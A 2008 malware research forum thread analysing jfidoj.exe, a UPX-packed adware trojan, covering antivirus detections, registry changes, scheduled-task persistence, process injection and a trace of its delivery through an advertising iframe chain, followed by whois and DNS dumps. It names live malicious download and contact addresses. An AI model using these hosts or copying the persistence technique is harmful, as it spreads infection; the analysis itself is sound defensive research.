Help - Search - Members - Calendar
Full Version: jfifoj.exe (Infection by adverts ... again !!!)
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
<h4>
File details
</h4>
Filename: jfidoj.exe

File size: 28224 bytes
MD5: 75e22e078a270abff4febcfdfb38cd0c
SHA1: 4624a501836bb1d7be97db88d64757d5215933d2
PEiD: -
packers: UPX
QUOTE
File jfidoj.exe received on 01.29.2008 23:58:48 (CET)
AhnLab-V3 2008.1.30.10 2008.01.29 -
AntiVir 7.6.0.57 2008.01.29 TR/Crypt.ULPM.Gen
Authentium 4.93.8 2008.01.29 -
Avast 4.7.1098.0 2008.01.29 -
AVG 7.5.0.516 2008.01.29 -
BitDefender 7.2 2008.01.29 -
CAT-QuickHeal 9.00 2008.01.29 -
ClamAV 0.91.2 2008.01.29 -
DrWeb 4.44.0.09170 2008.01.29 -
eSafe 7.0.15.0 2008.01.28 suspicious Trojan/Worm
eTrust-Vet 31.3.5494 2008.01.29 -
Ewido 4.0 2008.01.29 -
FileAdvisor 1 2008.01.30 -
Fortinet 3.14.0.0 2008.01.29 -
F-Prot 4.4.2.54 2008.01.29 -
F-Secure 6.70.13260.0 2008.01.29 -
Ikarus T3.1.1.20 2008.01.29 -
Kaspersky 7.0.0.125 2008.01.29 -
McAfee 5218 2008.01.29 New Malware.bl
Microsoft 1.3109 2008.01.28 Trojan:Win32/Bohmini.A
NOD32v2 2833 2008.01.29 -
Norman 5.80.02 2008.01.29 W32/Smalltroj.CNFU
Panda 9.0.0.4 2008.01.29 Adware/NaviPromo
Prevx1 V2 2008.01.30 -
Rising 20.29.12.00 2008.01.29 -
Sophos 4.25.0 2008.01.29 Mal/HckPk-A
Sunbelt 2.2.907.0 2008.01.29 -
Symantec 10 2008.01.29 -
TheHacker 6.2.9.201 2008.01.28 -
VBA32 3.12.2.6 2008.01.29 -
VirusBuster 4.3.26:9 2008.01.29 -
Webwasher-Gateway 6.6.2 2008.01.29 Trojan.Crypt.ULPM.Gen
<h4>
Technical details
</h4>
Registry changes.
  • Adds the following Values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
  • Deletes the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
  • Modifies the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
Files added.
QUOTE
c:\key.shm
Date: 1/30/2008 1:07 AM
Size: 166 bytes
%Temp%\1Ll5OSVH.hdi
Date: 1/30/2008 1:07 AM
Size: 0 bytes
%System%\[RANDOM NAME].exe
Date: 1/29/2008 11:48 PM
Size: 28,224 bytes

c:\WINDOWS\Tasks\At1.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes

up to

c:\WINDOWS\Tasks\At24.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes
Note:%Temp% is a variable that refers to the temporary folder in the short path form. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


<h4>
Notes
</h4>
Copies itself to the %System% folder under a Random name, lvmw140v.exe in our analysis. Launches lvmw140v.exe with the command line parameter firstrun.
IPB Image
Tries to inject itself in most running processes (writes to the virtual memory) and creates different mutexes to mark its presence on the system.
IPB Image

IPB Image
One or more of the hooked processes connect to internet and browser.php is requested from 194.126.193.157
IPB Image
Since 24 scheduled tasks are created, the program gets loaded every hour and every day (even after a reboot or shutdown). The tasks have been created under the SYSTEM account.
IPB Image
Kimberly
<h4>
Tracing back the origin of the file
</h4>
I was actually looking after SWF hijacks on a site that was a victim of the sponsoredads.com/images/members/1248/468x60.swf seen on youtube also, when suddenly I got a prompt from ProcessGuard about jfidoj.exe.
IPB Image
Where the hell did this file come from? To understand its origin, lets trace it backwards using the referer headers in the packets.
CODE
GET /ial/1201696503/e5cae51c4b588b9935f864175a694967.exe?affid=5085 HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

CODE
GET /ad/images/easy/easy2.gif HTTP/1.1
Accept: */*
Referer: http://199.202.248.50/ad/i?size=468x60&x=9&u=5085
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

CODE
GET /ad/i?size=468x60&x=9&u=5085 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?SwQAAFYtBAAPVgoABpkDAAIADAAAAP8AAAAEEgIABAMbNwUAVhgFAK5xBQAAAAAAAAAAAAAAAAAAAAAAAAAAAMXTK2UZ4qg.xdMrZRniqD8k2.l-arzEPyTb-X5qvMQ.SOF6FK5H0T9I4XoUrkfRPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACty6Mq6L6QP8CZaq9mbATD33b.e5Oqwl7DEFdwAAAAA=,,http://ad2.adecn.com/here.spot?v=2.2;time=317;spotid=7647;c=0;ms=1201710817092
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

199.202.248.50 does host a few rotating advertising banners - GIF format - and we also see an iframe present here. It's the code / script responsible for installing jfidoj.exe on our PC.
IPB Image

IPB Image

Full trace of the TCP/IP stream.

[attachmentid=774]
CODE
GET /iframe3?SwQAAFYtBAAPVgoABpkDAAIADAAAAP8AAAAEEgIABAMbNwUAVhgFAK5xBQAAAAAAAAAAAAAAAAAAAAAAAAAAAMXTK2UZ4qg.xdMrZRniqD8k2.l-arzEPyTb-X5qvMQ.SOF6FK5H0T9I4XoUrkfRPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACty6Mq6L6QP8CZaq9mbATD33b.e5Oqwl7DEFdwAAAAA=,,http://ad2.adecn.com/here.spot?v=2.2;time=317;spotid=7647;c=0;ms=1201710817092 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.media-servers.net/st?ad_type=iframe&ad_size=468x60§ion=273750
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cookie: uid=uid=7fefd83c-cf50-11dc-a6c3-001cc4a56bf9&_hmacv=1&_salt=2356122850&_keyid=k1&_hmac=af949060bbe2bf4d25521dbb343885442ded8a6f; liday1=gl%Aq[FcYkN1NBHUol3T; vuday1==-B7xoEKxaN1NBH!4Bc'; ih="b!!!!(!!Vyx!!!!#:#gf4!![JR!!!!#:#gb8!!k3a!!!!$:#geO!#'Xm!!!!#:#gb_!#(B.!!!!$:#gf3"; pv1="b!!!!#!!$P8!!$t[!!=-d!!Vyx!!7Ai!!mT-!?5%!(h139![(N+!!QW]!!D:>~~~~~~:#gf4~#rkkV"; fl_inst
=1
Connection: Keep-Alive
Host: ad.yieldmanager.com

Iframe on ad.yieldmanager.com
IPB Image
CODE
GET /st?ad_type=iframe&ad_size=468x60§ion=273750 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ad.media-servers.netConnection: Keep-Alive

CODE
GET /here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ad2.adecn.com
Connection: Keep-Alive
Cookie: EC=e268ed02af6acee0adb20a728fe266c6

Iframe on ad2.adecn.com
IPB Image
axill.com serves rotating ads, just like everybody else. In the capture below you can clearly see the code used to call a script located on cds.adecn.com. I left out the refer on purpose since it does identify the site owner.
IPB Image
Web site owners live from adverts, users are victim of adverts, advertising companies just care about the $...
We all advise to be careful:
  • with email attachments.
  • about p2p programs.
  • about visiting crack and p0rn sites.
  • etc ...
Seeing the recent developments; we will have to add Flash and adverts to our best practices advice speech very soon...
Kimberly
<h4>
The "Actors"
</h4>
199.202.248.50

QUOTE
Queried whois.arin.net with "199.202.248.50"...

OrgName: Metrix Interlink Inc.
OrgID: ILI
Address: 630 Boul. Rene-Levesque Ouest
Address: Suite 2300
City: Montreal
StateProv: QC
PostalCode: H3B-1S6
Country: CA

NetRange: 199.202.234.0 - 199.202.255.255
CIDR: 199.202.234.0/23, 199.202.236.0/22, 199.202.240.0/20
NetName: INTERLINK-NETS
NetHandle: NET-199-202-234-0-1
Parent: NET-199-0-0-0-0
NetType: Direct Allocation
NameServer: NS.UUNET.CA
NameServer: NS2.UUNET.CA
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABL
RegDate: 1994-06-14
Updated: 2006-10-12

RTechHandle: AM43-ARIN
RTechName: Matoga, Andrew
RTechPhone: +1-514-875-0010
RTechEmail: admin@interlink.net

OrgAbuseHandle: ABUSE3-ARIN
OrgAbuseName: abuse
OrgAbusePhone: +1-800-900-0241
OrgAbuseEmail: abuse-mail@verizonbusiness.com

OrgNOCHandle: OA12-ARIN
OrgNOCName: UUnet Technologies, Inc., Technologies
OrgNOCPhone: +1-800-900-0241
OrgNOCEmail: help4u@verizonbusiness.com

OrgTechHandle: SWIPP-ARIN
OrgTechName: swipper
OrgTechPhone: +1-800-900-0241
OrgTechEmail: swipper@verizonbusiness.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 50.248.202.199.in-addr.arpa returned an error from the server: NameError

No records to display

Service scan
FTP - 21 220 (vsFTPd 2.0.5)
500 OOPS: vsf_sysutil_recv_peek: no data
500 OOPS: child died

SMTP - 25 Error: ConnectionRefused
HTTP - 80 HTTP/1.1 200 OK
Date: Wed, 30 Jan 2008 17:13:17 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
Last-Modified: Tue, 18 Dec 2007 19:51:59 GMT
ETag: "1a84e8-1-dc9bb5c0"
Accept-Ranges: bytes
Content-Length: 1
Connection: close
Content-Type: text/html
POP3 - 110 Error: ConnectionRefused
IMAP - 143 Error: ConnectionRefused

QUOTE
Looking up nameservers in charge for 199.202.248.50...

e.root-servers.net told us to ask A.ROOT-SERVERS.NET. NSTLD.VERISIGN-GRS.COM. 2008013000 1800 900 604800 86400
NS-Record(s) for 199.202.248.50 at parent-server A.ROOT-SERVERS.NET. NSTLD.VERISIGN-GRS.COM. 2008013000 1800 900 604800 86400:
L.GTLD-SERVERS.NET. 192.41.162.30
M.GTLD-SERVERS.NET. 192.55.83.30
A.GTLD-SERVERS.NET. 192.5.6.30
B.GTLD-SERVERS.NET. 192.33.14.30
C.GTLD-SERVERS.NET. 192.26.92.30
D.GTLD-SERVERS.NET. 192.31.80.30
E.GTLD-SERVERS.NET. 192.12.94.30
F.GTLD-SERVERS.NET. 192.35.51.30
G.GTLD-SERVERS.NET. 192.42.93.30
H.GTLD-SERVERS.NET. 192.54.112.30
I.GTLD-SERVERS.NET. 192.43.172.30
J.GTLD-SERVERS.NET. 192.48.79.30
K.GTLD-SERVERS.NET. 192.52.178.30

Error looking up NS-Records for 199.202.248.50 !

MX-Servers for 199.202.248.50:

SOA-Record for 199.202.248.50:

Serial:
Refresh:
Retry:
Expire: (0 hours or 0 days)
TTL:

SPF/TXT-Records for 199.202.248.50:
No TXT-Records for 199.202.248.50!
No SPF-Records for 199.202.248.50!

NS-Versioninfo:
Error looking up NS-Records for 199.202.248.50 !

Recursive-Queries:
Error looking up NS-Records for 199.202.248.50 !

NS-AXFR:
Error looking up NS-Records for 199.202.248.50 !

QUOTE
System / Port: 199.202.248.50 : 80
IP: 199.202.248.50
System uptime: System uptime seems: 12 days, 23 hours, 27 minutes, 34 seconds
Initial TTL-Value (TCP): 64
Initial TTL-Value (ICMP): 64
TTL of returning TCP-packets: 52 (12 TCP- Hops between ServerSniff and the target 199.202.248.50)
TTL of returning ICMP-packets: 52 (12 ICMP- Hops between ServerSniff and the target 199.202.248.50)
TCP-window-size: 5792
Gathered tcp-timestamps: 1121248476
1121249455
1121250468
1121251498
1121252515
1121253520
1121254529

Gathered tcp-sequence-numbers: 300824546 (300824546)
292250785 (8573761)
294346247 (2095462)
295513575 (1167328)
308615082 (13101507)
296364599 (12250483)
308951725 (12587126)

TCP RoundTripTimes: 147.1 ms, 144.5 ms, 155.2 ms, 164.9 ms, 167.3 ms, 178.6 ms, 207.1 ms
Average time for TCP-packets:
<>(TCP, Port 80, [rtt]): 166.39 ms <> (min: 144.5, max: 207.1)
We consider this a bit slow
Average time for ICMP-packets:
<>ICMP-Echo, [rtt]): 157.6 ms <> (min: 123.9, max: 200.7)
We consider this a bit slow
Gathered IP-ids (tcp): The system doesn't return any TCP IP-IDs.
Gathered IP-ids (ICMP): 48966
48967
48968
48969
48970
48971
48972

Don't-fragment-bit (df) set: yes
Sending packet to port 1: System answers on port 1 with RST
Sending packet with wrong CRC to port 1: System answers on to BAD-Packets on port 1.
Firewall?
References:

http://www.robtex.com/ip/199.202.248.50.html
http://www.robtex.com/route/199.202.248.0-24.html
http://serversniff.net/asreport-817.html
______________________________

ad.yieldmanager.com

QUOTE
Address lookup
canonical name ad.yieldmanager.com.
aliases
addresses 76.13.212.11

Domain Whois record
Queried whois.internic.net with "dom yieldmanager.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: YIELDMANAGER.COM
Registrar: MARKMONITOR INC.
Whois Server: whois.markmonitor.com
Referral URL: http://www.markmonitor.com
Name Server: PDNS3.ULTRADNS.ORG
Name Server: PDNS4.ULTRADNS.ORG
Name Server: PDNS1.ULTRADNS.NET
Name Server: PDNS2.ULTRADNS.NET
Name Server: PDNS5.ULTRADNS.INFO
Name Server: PDNS6.ULTRADNS.CO.UK
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 19-jul-2007
Creation Date: 08-aug-2001
Expiration Date: 08-aug-2009

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.markmonitor.com with "yieldmanager.com"...

MarkMonitor.com - The Leader in Corporate Domain Management
----------------------------------------------------------
For Global Domain Consolidation, Research & Intelligence,
and Enterprise DNS, go to: www.markmonitor.com
----------------------------------------------------------

The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com
for information purposes, and to assist persons in obtaining information
about or related to a domain name registration record. MarkMonitor.com
does not guarantee its accuracy. By submitting a WHOIS query, you agree
that you will use this Data only for lawful purposes and that, under no
circumstances will you use this Data to: (1) allow, enable, or otherwise
support the transmission of mass unsolicited, commercial advertising or
solicitations via e-mail (spam); or (2) enable high volume, automated,
electronic processes that apply to MarkMonitor.com (or its systems).
MarkMonitor.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.
Registrant:
Yahoo! Inc.
(DOM-1506094)
701 First Avenue
Sunnyvale
CA
94089
US

Domain Name: yieldmanager.com

Registrar Name: Markmonitor.com
Registrar Whois: whois.markmonitor.com
Registrar Homepage: http://www.markmonitor.com

Administrative Contact:
Domain Administrator
(NIC-1457976)
Yahoo! Inc.
701 First Avenue
Sunnyvale
CA
94089
US
domainadmin@yahoo-inc.com
+1.4083493300
Fax- +1.4083493301
Technical Contact, Zone Contact:
Domain Administrator
(NIC-1457976)
Yahoo! Inc.
701 First Avenue
Sunnyvale
CA
94089
US
domainadmin@yahoo-inc.com
+1.4083493300
Fax- +1.4083493301

Created on..............: 2001-Aug-08.
Expires on..............: 2009-Aug-08.
Record last updated on..: 2007-Sep-18 09:45:58.

Domain servers in listed order:

PDNS1.ULTRADNS.NET
PDNS5.ULTRADNS.INFO
PDNS2.ULTRADNS.NET
PDNS6.ULTRADNS.CO.UK
PDNS3.ULTRADNS.ORG
PDNS4.ULTRADNS.ORG

MarkMonitor.com - The Leader in Corporate Domain Management
----------------------------------------------------------
For Global Domain Consolidation, Research & Intelligence,
and Enterprise DNS, go to: www.markmonitor.com
----------------------------------------------------------

Network Whois record
Queried whois.arin.net with "76.13.212.11"...

OrgName: Yahoo
OrgID: YHOO
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 76.13.0.0 - 76.13.255.255
CIDR: 76.13.0.0/16
NetName: A-YAHOO-US7
NetHandle: NET-76-13-0-0-1
Parent: NET-76-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM
Comment:
RegDate: 2007-05-02
Updated: 2007-09-13

RAbuseHandle: NETWO857-ARIN
RAbuseName: Network Abuse
RAbusePhone: +1-408-349-3300
RAbuseEmail: network-abuse@cc.yahoo-inc.com

RTechHandle: NA258-ARIN
RTechName: Netblock Admin
RTechPhone: +1-408-349-3300
RTechEmail: jluster@yahoo-inc.com

OrgAbuseHandle: NETWO857-ARIN
OrgAbuseName: Network Abuse
OrgAbusePhone: +1-408-349-3300
OrgAbuseEmail: network-abuse@cc.yahoo-inc.com

OrgTechHandle: NA258-ARIN
OrgTechName: Netblock Admin
OrgTechPhone: +1-408-349-3300
OrgTechEmail: jluster@yahoo-inc.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
name class type data time to live
ad.yieldmanager.com IN A 76.13.208.11 300s (00:05:00)
yieldmanager.com IN TXT v=spf1 mx a:mail.sj.yieldmanager.com mx:mail.se.yieldmanager.com ip4:208.67.64.0/21 ip4:72.37.156.25/32 include:rightmedia.com ~all 600s (00:10:00)
yieldmanager.com IN SOA server: pdns1.ultradns.net
email: dns.rightmedia.com
serial: 2008012803
refresh: 1200
retry: 120
expire: 1209600
minimum ttl: 3600
1800s (00:30:00)
yieldmanager.com IN A 208.67.66.24 3600s (01:00:00)
yieldmanager.com IN NS pdns6.ultradns.co.uk 86400s (1.00:00:00)
yieldmanager.com IN NS pdns5.ultradns.info 86400s (1.00:00:00)
yieldmanager.com IN NS pdns4.ultradns.org 86400s (1.00:00:00)
yieldmanager.com IN NS pdns3.ultradns.org 86400s (1.00:00:00)
yieldmanager.com IN NS pdns2.ultradns.net 86400s (1.00:00:00)
yieldmanager.com IN NS pdns1.ultradns.net 86400s (1.00:00:00)
yieldmanager.com IN MX preference: 10
exchange: mail.se.yieldmanager.com
600s (00:10:00)
11.212.13.76.in-addr.arpa IN PTR ad1.p3.vip.rm.sp1.yahoo.com 932s (00:15:32)
______________________________

ad.media-servers.net

QUOTE
Address lookup
canonical name ad.yieldmanager.com.
aliases ad.media-servers.net

addresses 76.13.212.11

Domain Whois record
Queried whois.internic.net with "dom media-servers.net"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MEDIA-SERVERS.NET
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 10-dec-2006
Creation Date: 19-sep-2004
Expiration Date: 19-sep-2008

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.godaddy.com with "media-servers.net"...

The data contained in GoDaddy.com, Inc.'s WhoIs database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose is expressly forbidden without the prior written
permission of GoDaddy.com, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty. In particular,
you agree not to use this data to allow, enable, or otherwise make possible,
dissemination or collection of this data, in part or in its entirety, for any
purpose, such as the transmission of unsolicited advertising and
and solicitations of any kind, including spam. You further agree
not to use this data to enable high volume, automated or robotic electronic
processes designed to collect or compile this data for any purpose,
including mining this data for your own personal or commercial purposes.

Please note: the registrant of the domain name is specified
in the "registrant" field. In most cases, GoDaddy.com, Inc.
is not the registrant of domain names listed in this database.

Registrant:
Domains by Proxy, Inc.

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MEDIA-SERVERS.NET

Domain servers in listed order:
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET
NS3.EVERYDNS.NET
NS4.EVERYDNS.NET


For complete domain details go to:
http://who.godaddy.com/whoischeck.aspx?Dom...DIA-SERVERS.NET

Network Whois record
Queried whois.arin.net with "76.13.212.11"...

OrgName: Yahoo
OrgID: YHOO
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 76.13.0.0 - 76.13.255.255
CIDR: 76.13.0.0/16
NetName: A-YAHOO-US7
NetHandle: NET-76-13-0-0-1
Parent: NET-76-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM
Comment:
RegDate: 2007-05-02
Updated: 2007-09-13

RAbuseHandle: NETWO857-ARIN
RAbuseName: Network Abuse
RAbusePhone: +1-408-349-3300
RAbuseEmail: network-abuse@cc.yahoo-inc.com

RTechHandle: NA258-ARIN
RTechName: Netblock Admin
RTechPhone: +1-408-349-3300
RTechEmail: jluster@yahoo-inc.com

OrgAbuseHandle: NETWO857-ARIN
OrgAbuseName: Network Abuse
OrgAbusePhone: +1-408-349-3300
OrgAbuseEmail: network-abuse@cc.yahoo-inc.com

OrgTechHandle: NA258-ARIN
OrgTechName: Netblock Admin
OrgTechPhone: +1-408-349-3300
OrgTechEmail: jluster@yahoo-inc.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
name class type data time to live
ad.media-servers.net IN CNAME ad.yieldmanager.com 2104s (00:35:04)
ad.yieldmanager.com IN A 76.13.212.11 300s (00:05:00)
media-servers.net IN SOA server: ns1.everydns.net
email: hostmaster.media-servers.net
serial: 1201720007
refresh: 3600
retry: 900
expire: 1209600
minimum ttl: 3600
360s (00:06:00)
media-servers.net IN NS ns1.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns2.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns3.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns4.everydns.net 86400s (1.00:00:00)
media-servers.net IN A 65.254.32.138 86400s (1.00:00:00)
11.212.13.76.in-addr.arpa IN PTR ad1.p3.vip.rm.sp1.yahoo.com 807s (00:13:27)
______________________________

ad2.adecn.com

QUOTE
Address lookup
canonical name ad2.adecn.com.
aliases
addresses 209.10.222.100

Domain Whois record
Queried whois.internic.net with "dom adecn.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ADECN.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: NS3.MSFT.NET
Name Server: NS1.MSFT.NET
Name Server: NS5.MSFT.NET
Name Server: NS2.MSFT.NET
Name Server: NS4.MSFT.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 12-dec-2007
Creation Date: 29-nov-1999
Expiration Date: 29-nov-2010

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.tucows.com with "adecn.com"...

Registrant:
Microsoft Corporation
1 Microsoft Way
Redmond, WA 98052
US

Domain name: ADECN.COM

Administrative Contact:
Administrator, Domain DOMAINS@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
+1.4258828080
Technical Contact:
Hostmaster, MSN msnhst@microsoft.com
One Microsoft Way
Redmond, WA 98052
US
+1.4258828080


Registration Service Provider:
DBMS VeriSign, dbms-support@verisign.com
800-579-2848 x4
Please contact DBMS VeriSign for domain updates, DNS/Nameserver
changes, and general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 12-Dec-2007.
Record expires on 29-Nov-2010.
Record created on 29-Nov-1999.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS2.MSFT.NET
NS4.MSFT.NET
NS1.MSFT.NET
NS5.MSFT.NET
NS3.MSFT.NET


Domain status: clientTransferProhibited
clientUpdateProhibited

The Data in the Tucows Registrar WHOIS database is provided to you by Tucows
for information purposes only, and may be used to assist you in obtaining
information about or related to a domain name's registration record.

Tucows makes this information available "as is," and does not guarantee its
accuracy.

By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances will you use this data to:
a) allow, enable, or otherwise support the transmission by e-mail,
telephone, or facsimile of mass, unsolicited, commercial advertising or
solicitations to entities other than the data recipient's own existing
customers; or (b) enable high volume, automated, electronic processes that
send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.

The compilation, repackaging, dissemination or other use of this Data is
expressly prohibited without the prior written consent of Tucows.

Tucows reserves the right to terminate your access to the Tucows WHOIS
database in its sole discretion, including without limitation, for excessive
querying of the WHOIS database or for failure to otherwise abide by this
policy.

Tucows reserves the right to modify these terms at any time.

By submitting this query, you agree to abide by these terms.

NOTE: THE WHOIS DATABASE IS A CONTACT DATABASE ONLY. LACK OF A DOMAIN
RECORD DOES NOT SIGNIFY DOMAIN AVAILABILITY.

Network Whois record
Queried whois.arin.net with "209.10.222.100"...

OrgName: Globix Corporation
OrgID: GLBX
Address: 95 Christopher Colombus Dr.
City: Jersey City
StateProv: NJ
PostalCode: 07302
Country: US

NetRange: 209.10.0.0 - 209.10.255.255
CIDR: 209.10.0.0/16
OriginAS: AS4513
NetName: GLOBIXBLK3
NetHandle: NET-209-10-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: ANS1.JCY1.QUALITYTECH.COM
NameServer: ANS1.NYC16.QUALITYTECH.COM
NameServer: ANS1.SJC1.QUALITYTECH.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-16
Updated: 2007-09-18

RAbuseHandle: ABUSE1735-ARIN
RAbuseName: Abuse
RAbusePhone: +1-866-239-5000
RAbuseEmail: abuse@qualitytech.com

RNOCHandle: GLOBI-ARIN
RNOCName: Globix Support
RNOCPhone: +1-212-625-7777
RNOCEmail: support@globix.net

RTechHandle: SWIPP1-ARIN
RTechName: Swipper
RTechPhone: +1-212-625-7777
RTechEmail: swipper@globix.net

RTechHandle: GCH2-ARIN
RTechName: Globix Corporation Hostmaster
RTechPhone: +1-212-334-8500
RTechEmail: arin-admin@globix.net

OrgAbuseHandle: ABUSE1735-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-866-239-5000
OrgAbuseEmail: abuse@qualitytech.com

OrgNOCHandle: GLOBI-ARIN
OrgNOCName: Globix Support
OrgNOCPhone: +1-212-625-7777
OrgNOCEmail: support@globix.net

OrgTechHandle: GCH2-ARIN
OrgTechName: Globix Corporation Hostmaster
OrgTechPhone: +1-212-334-8500
OrgTechEmail: arin-admin@globix.net

OrgTechHandle: SWIPP1-ARIN
OrgTechName: Swipper
OrgTechPhone: +1-212-625-7777
OrgTechEmail: swipper@globix.net

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 100.96-28.222.10.209.in-addr.arpa returned an error from the server: NameError

name class type data time to live
ad2.adecn.com IN A 209.10.222.100 741s (00:12:21)
adecn.com IN A 209.10.222.113 1800s (00:30:00)
adecn.com IN NS ns3.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns4.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns1.msft.net 172800s (2.00:00:00)
